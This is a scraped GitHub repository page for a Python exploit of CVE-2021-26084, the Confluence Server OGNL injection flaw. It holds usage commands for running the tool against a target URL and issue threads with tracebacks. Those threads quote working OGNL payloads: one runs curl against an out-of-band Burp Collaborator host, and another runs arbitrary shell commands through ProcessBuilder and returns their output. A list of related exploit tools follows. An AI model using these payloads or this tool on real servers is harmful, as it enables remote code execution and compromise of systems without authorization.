Confluence Server Webwork OGNL injection

Overview

CVE-2021-26084 - Confluence Server Webwork OGNL injection

  • An OGNL injection vulnerability exists that would allow an authenticated user and in some instances unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

IMPORTANT

This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission.

• queryString param Request

BurpRequest

Exploit Usage

Commands:

$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com

or

$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x

• Exploitation with Confluence_OGNLInjection.py

Exploit

  • References:

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

https://www.exploit-db.com/exploits/50243

Comments
  • TypeError: 'NoneType' object is not subscriptable

    TypeError: 'NoneType' object is not subscriptable

    └─# python3 confluence_exploit.py -u https://confluence.contoso.com -p /pages/createpage-entervariables.action?SpaceKey=x
    ---------------------------------------------------------------
    [-] Confluence Server Webwork OGNL injection
    [-] CVE-2021-26084
    [-] https://github.com/h3v0x
    --------------------------------------------------------------- 
    
    > id
    Traceback (most recent call last):
      File "/root/confluence_exploit.py", line 62, in <module>
        cmdExec()
      File "/root/confluence_exploit.py", line 57, in cmdExec
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
    TypeError: 'NoneType' object is not subscriptable
    
    opened by 0xabdi 3
  • not working, but another payload is ok

    not working, but another payload is ok

    shell not work (empty input), but payload like: aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022java.lang.Runtime\u0022).getMethod(\u0022getRuntime\u0022,null).invoke(null,null).exec(\u0022curl <instance>.burpcollaborator.net\u0022)}%2b\u0027

    work fine, why?

    opened by foozzi 2
  • Fixing ident

    Fixing ident

    File "/home/kali/Downloads/apktool/Confluence_OGNLInjection.py", line 20 import optparse from requests.packages import urllib3 ^ SyntaxError: invalid syntax

    opened by zeroc00I 0
  • Error when running

    Error when running

    Hi team, I run the command: $ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x Then used the id command and I got this as output: '''

    id aaaaaaaa\u0027+{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var isWin = java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022); var cmd = new java.lang.String(\u0022id\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\u0022cmd.exe\u0022, \u0022/c\u0022, cmd); } else{p.command(\u0022bash\u0022, \u0022-c\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \u0022\u0022; var output = \u0022\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\u0027)}+\u0027

    '''

    How can I deal with this issue? Thank u

    opened by khanhchauminh 1
  • traceback

    traceback

    hello please could you help me


    [-] Confluence Server Webwork OGNL injection [-] CVE-2021-26084 [-] https://github.com/h3v0x

    id Traceback (most recent call last): File "/root/CVE-2021-26084_Confluence/Confluence_OGNLInjection.py", line 72, in cmdExec() File "/root/CVE-2021-26084_Confluence/Confluence_OGNLInjection.py", line 67, in cmdExec queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] TypeError: 'NoneType' object is not subscriptable

    opened by BroXEX 2
Owner
Fellipe Oliveira
just a wanderer...
Fellipe Oliveira
Confluence OGNL injection

CVE-2021-26084 Confluence OGNL injection CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Conflue

Ashish Kunwar 15 Sep 23, 2022
Aiminsun 165 Dec 21, 2022
Caretaker 2 Jun 6, 2022
CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

FQ Hsu 63 Dec 30, 2022
Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

sqlmapproject 25.7k Jan 8, 2023
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

EntySec 100 Dec 23, 2022
Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS

Enox 47 Nov 9, 2022
Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://<

Michael Tsai 12 Nov 9, 2022
WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities Which is a great tool for web pentesters. Coded in python3, CLI. WebScan is capable of scanning and detecting sql injection vulnerabilities across HTTP and HTTP sites.

AnonyminHack5 12 Dec 2, 2022
Reusable Lightweight Pythonic Dependency Injection Library

Vacuna Inject everything! Vacuna is a little library to provide dependency management for your python code. Install pip install vacuna Usage import va

Fernando Martínez González 16 Sep 15, 2021
A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o

null 2 Nov 9, 2022
Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries. Using xrefs to commonly injected and format string'd files, it will scan binaries faster than Firmware Slap.

Christopher Roberts 3 Nov 16, 2021
Sqli-Scanner is a python3 script written to scan websites for SQL injection vulnerabilities

Sqli-Scanner is a python3 script written to scan websites for SQL injection vulnerabilities Features 1 Scan one website 2 Scan multiple websites Insta

Anontemitayo 9 Dec 30, 2022
logmap: Log4j2 jndi injection fuzz tool

logmap - Log4j2 jndi injection fuzz tool Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path Use http

之乎者也 67 Oct 25, 2022
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
Dependency injection in python with autoconfiguration

The base is a DynamicContainer to autoconfigure services using the decorators @services for regular services and @command_handler for using command pattern.

Sergio Gómez 2 Jan 17, 2022
This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

Windy 32 Nov 5, 2022
CVE-2022-23046 - SQL Injection Vulnerability on PhpIPAM v1.4.4

CVE-2022-23046 PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL s

null 2 Feb 15, 2022
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) CVE: CVE-2022-22947 CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947)

Carlos Vieira 35 Dec 28, 2022